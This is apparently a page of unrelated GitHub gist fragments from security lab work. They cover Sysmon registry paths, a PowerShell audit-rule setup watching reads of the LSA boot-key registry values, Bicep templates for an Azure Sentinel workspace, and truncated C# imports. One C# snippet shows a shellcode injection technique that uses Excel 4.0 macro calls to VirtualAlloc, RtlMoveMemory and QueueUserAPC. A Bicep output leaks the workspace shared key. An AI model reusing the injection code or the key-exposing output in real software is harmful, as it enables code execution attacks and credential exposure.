- HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
- HKLM\System\CurrentControlSet\Control\WMI\Security\08dd09cd-9050-5a49-02f8-46fd443360a8
- HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\ChannelReferences\0
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\ChannelReferences
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
  
    
  | # Download https://github.com/OTRF/Set-AuditRule/blob/master/Set-AuditRule.ps1 | |
| Import-Module .\Set-AuditRule.ps1 | |
| $AuditRules = @" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "@ | 
  
    
  | var memaddr = Convert.ToDouble(excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"VirtualAlloc\\",\\"JJJJJ\\"," + lpAddress + "," + shellcode.Length + ",4096,64)" })); | |
| var startaddr = memaddr; | |
| foreach (var b in shellcode) { | |
| var cb = String.Format("CHAR({0})", b); | |
| var macrocode = "CALL(\\"Kernel32\\",\\"RtlMoveMemory\\",\\"JJCJ\\"," + memaddr + "," + cb + ",1)"; | |
| excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { macrocode }); | |
| memaddr++; | |
| } | |
| excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"QueueUserAPC\\",\\"JJJJ\\"," + startaddr + ", -2, 0)" }); | 
  
    
// Deployment timestamp. Bicep/ARM only allow utcNow() as a parameter default value,
// which is why it is captured in a parameter instead of being called elsewhere.
// NOTE(review): the description below is utcNow()'s own documentation text rather than a
// description of this parameter; consider rewording it to say what the value is used for.
param utcValue string {
  default: utcNow()
  metadata: {
    description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
  }
}
| param workspaceName string { | |
| metadata: { | |
| description: 'Name for the Log Analytics workspace used to aggregate data.' | |
| } | 
  
    
// Workspace name and customer (workspace) ID for consumers that need to address this workspace.
output workspaceNameOutput string = uniqueWorkspace
output workspaceIdOutput string = reference(workspace.id, workspace.apiVersion).customerId
// NOTE(review): this emits the workspace's primary shared key as a plain deployment output.
// Deployment outputs are persisted with the deployment record and are readable by anyone
// with read access to the deployment history, so the key is effectively written to a log.
// Prefer having the consumer call listKeys at use time, or rotate the key after deployment.
output workspacekeyOutput string = listKeys(workspace.id, workspace.apiVersion).primarySharedKey
  
    
// Deployment timestamp. Bicep/ARM only allow utcNow() as a parameter default value,
// which is why it is captured in a parameter instead of being called elsewhere.
// NOTE(review): the description below is utcNow()'s own documentation text rather than a
// description of this parameter; consider rewording it to say what the value is used for.
param utcValue string {
  default: utcNow()
  metadata: {
    description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
  }
}
| param workspaceName string { | |
| metadata: { | |
| description: 'Name for the Log Analytics workspace used to aggregate data.' | |
| } | 
  
    
  | resource azureSentinel 'Microsoft.OperationsManagement/solutions@2015-11-01-preview' = { | |
| name: concat('SecurityInsights(',workspace.name,')') // Implicit Dependency | |
| location: 'eastus' | |
| properties: { | |
| workspaceResourceId: workspace.id | |
| } | |
| plan: { | |
| name: concat('SecurityInsights(',workspace.name,')') // Implicit Dependency | |
| product: 'OMSGallery/SecurityInsights' | |
| publisher: 'Microsoft' | 
  
    
  | resource workspace 'Microsoft.OperationalInsights/workspaces@2020-03-01-preview' = { | |
| name: 'UniqueWorkspaceName' // must be globally unique | |
| location: 'eastus' | |
| properties: { | |
| sku: { | |
| name: 'PerGB2018' | |
| } | |
| retentionInDays: 30 | |
| features: { | |
| immediatePurgeDataOn30Days: true | 
  
    
  | using System; | |
| using System.Net; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Text.RegularExpressions; | |
| using System.IO.Pipes; | |
| using System.Reflection; | |
| using System.Collections.Generic; | |
| using System.Security.Cryptography; | 